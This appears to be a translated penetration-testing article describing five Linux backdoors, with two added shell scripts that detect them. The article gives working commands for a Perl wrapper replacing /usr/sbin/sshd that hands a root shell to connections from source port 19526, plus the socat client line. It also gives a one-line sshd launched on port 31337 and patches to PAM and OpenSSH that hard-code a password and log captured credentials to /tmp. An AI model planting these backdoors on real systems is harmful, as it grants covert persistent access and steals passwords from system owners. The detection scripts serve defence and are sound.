N backdoors in Linux

Source: Internet
Author: User


Preface

During penetration tests we frequently encounter Linux hosts of many kinds. This article summarises and discusses several kinds of backdoor on Linux.

Technique 1. PAM backdoor

Overview:

PAM (Pluggable Authentication Modules) is an authentication framework originally proposed by Sun. It provides dynamically loaded libraries and a unified API that separate a service from the authentication method it uses, so an administrator can configure different authentication methods for different services as needed without changing the service programs, and new authentication methods can be added to the system easily. PAM was first integrated into Solaris and has since been ported to Linux, SunOS, HP-UX 9.0 and other systems.

The basic idea of a PAM backdoor is to patch pam_unix_auth.c in the stock PAM module source and rebuild the module.

Procedure:

1. Find the PAM version used by the target system:

   rpm -qa | grep pam

2. Compile and install PAM.

3. Patch pam_unix_auth.c and compile it to generate the local module.

4. The compiled module is modules/pam_unix/.libs/pam_unix.so. The backdoor password is root123, and the passwords used for root logons are recorded in /tmp/pslog.

Features:
Advantage: relatively well concealed and hard to discover.
Disadvantage: a build environment is required; problems occur if GCC or other dependencies are missing.

Technique 2. OpenSSH backdoor

Overview:

Idea: download the source of the OpenSSH version in use together with the matching patch package. The patch package contains sshbd5.9p1.diff, the backdoor patch, which modifies auth.c, auth-pam.c, auth-passwd.c, canohost.c, includes.h, log.c, servconf.c, sshconnect2.c, sshlogin.c and version.h.

# tar -zxvf openssh-5.9p1.tar.gz

# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

vim includes.h    // edit the backdoor password and the locations of the record files

#define ILOG "/tmp/ilog"        // records the user names and passwords used to log on to this machine
#define OLOG "/tmp/olog"        // records the user names and passwords used to log on to remote machines from this one
#define SECRETPW "root123"      // the backdoor password

Advantage: relatively well concealed and hard to discover.
Disadvantage: a build environment is required; problems occur if GCC or other dependencies are missing.
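A defensive check for the two techniques above, added here and not part of the original article: a patched pam_unix.so or sshd no longer matches the digest recorded in the rpm database, and both patches write captured credentials to fixed paths under /tmp. The rpm -V attribute layout (SM5DLUGTP) is rpm's own; the rpm -V lines fed to the parser in the test are a constructed sample.

```shell
#!/bin/sh
# Added defensive example, not code from the article: look for the traces
# the PAM and OpenSSH backdoors leave on an RPM-based host.

# Read `rpm -V` output from stdin and print every file whose digest flag
# ('5', third character of the SM5DLUGTP attribute field) is set, plus
# files reported as missing. A replaced pam_unix.so or sshd shows up here
# unless the attacker also rewrote the rpm database.
rpm_verify_digest_mismatches() {
    while read -r flags rest; do
        # $rest may carry a type marker first ("c /etc/pam.d/sshd"), so
        # take the last whitespace-separated token as the path.
        case "$flags" in
            missing)    echo "MISSING ${rest##* }" ;;
            ??5??????)  echo "DIGEST ${rest##* }" ;;
        esac
    done
}

# Both patches hard-code where they drop captured passwords
# (/tmp/pslog for PAM, /tmp/ilog and /tmp/olog for OpenSSH). Print any
# that exist; an optional prefix lets the check run against a mounted image.
credential_log_files() {
    root=${1:-}
    for f in /tmp/pslog /tmp/ilog /tmp/olog; do
        [ -e "$root$f" ] && echo "CREDLOG $root$f"
    done
    return 0
}

# Live run on the local host (only when invoked with --live).
if [ "${1:-}" = "--live" ]; then
    rpm -V pam openssh-server 2>/dev/null | rpm_verify_digest_mismatches
    credential_log_files
fi
```

rpm -V trusts the local rpm database, and prelinked binaries can produce spurious digest mismatches, so confirm any hit by comparing the file with a copy from a known-good package or from a clean boot medium.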

Technique 3. Quick ssh backdoor

Overview:

Run the following command on the remote host:

# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=31337;

This spawns a second sshd listening on port 31337. Connect to port 31337 and log on using root, bin, ftp or mail as the user name and password.


Features:

Advantage: weakly concealed, suitable for short-term access.
Disadvantage: it does not survive a reboot, after which it can no longer be reached.

Technique 4. SSH wrapper backdoor

Overview:

Init starts /usr/sbin/sshd, which is now the Perl script. When the script reaches getpeername there is no peer yet, so the regular expression does not match and the script falls through to the next statement, which runs /usr/bin/sshd (the original sshd binary) with /usr/sbin/sshd as its argv[0]. When a TCP connection arrives on the listening port, the original sshd forks a child to handle it; the child performs no checks of its own but directly executes the sshd at the system default path, /usr/sbin/sshd, so control returns to the script. By this time the child's standard input and output have been redirected to the socket, so getpeername(STDIN) returns the client's address and with it the client's TCP source port: the two bytes after the address family in the returned sockaddr hold the port in network byte order, and 19526 is 0x4C46, the ASCII bytes "LF". If the source port is 19526 the script execs /bin/sh and the connection becomes a shell.

On the target host (where sshd runs):
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' > sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..LF/);' >> sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd", @ARGV;' >> sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

On the control end:
socat STDIO TCP4:target_ip:22,sourceport=19526

Features:

Advantage: highly concealed, needs no compiling, and works in most environments.
Disadvantage: the sshd process must be restarted.
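A detection check for techniques 3 and 4, added here and not part of the original article: the wrapper turns /usr/sbin/sshd from an ELF binary into a Perl script, and the quick backdoor appears in the process list as an sshd started from /tmp with -oPort=. The functions take a file path and ps -eo pid,args output respectively; the ps lines in the test are constructed samples.

```shell
#!/bin/sh
# Added defensive example, not code from the article: two checks for the
# sshd tricks above. The wrapper replaces the ELF /usr/sbin/sshd with a
# Perl script, and the "quick" backdoor runs sshd through a symlink in
# /tmp with -oPort=, which is visible in the process list.

# Classify a file by its first bytes: "elf" for the ELF magic, "script"
# for a "#!" shebang, "other" otherwise. Uses od, so it needs no `file`.
sshd_binary_kind() {
    magic=$(od -An -tx1 -N4 "$1" | tr -d ' \n')
    case "$magic" in
        7f454c46*) echo elf ;;      # \x7fELF
        2321*)     echo script ;;   # "#!"
        *)         echo other ;;
    esac
}

# Read `ps -eo pid,args` lines from stdin and print processes that look
# like a hand-started sshd: a port option on an executable that is not
# /usr/sbin/sshd, or the packaged sshd listening on a port other than 22.
# Heuristic: a host that legitimately runs sshd on another port needs
# that port whitelisted here.
suspicious_sshd_procs() {
    while read -r pid cmd args; do
        port=""
        case " $args" in
            *" -oPort="*) port=${args##*"-oPort="}; port=${port%%" "*} ;;
            *" -p "*)     port=${args##*"-p "};     port=${port%%" "*} ;;
        esac
        # Only sshd-named commands and commands carrying a port option matter.
        case "${cmd##*/}" in sshd) ;; *) [ -n "$port" ] || continue ;; esac
        if [ "$cmd" != /usr/sbin/sshd ]; then
            echo "$pid odd-path $cmd"
        elif [ -n "$port" ] && [ "$port" != 22 ]; then
            echo "$pid odd-port $port"
        fi
    done
}

# Live use: sshd_binary_kind /usr/sbin/sshd; ps -eo pid,args | suspicious_sshd_procs
```

The wrapped sshd keeps /usr/sbin/sshd as its argv[0], so it is the file-type check rather than the process listing that catches technique 4.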

Technique 5. Using the mafix rootkit to create a backdoor

Overview: Mafix is a common lightweight application-level rootkit. It allows remote login by faking an ssh protocol vulnerability, is simple to configure, and lets you customise the verification password and port number.
After installation, log on remotely with ssh user@IP -p <configured port>.

Features:

Advantage: average concealment, no compiling needed.
Disadvantage: ls and other commands are replaced, which is easy to notice.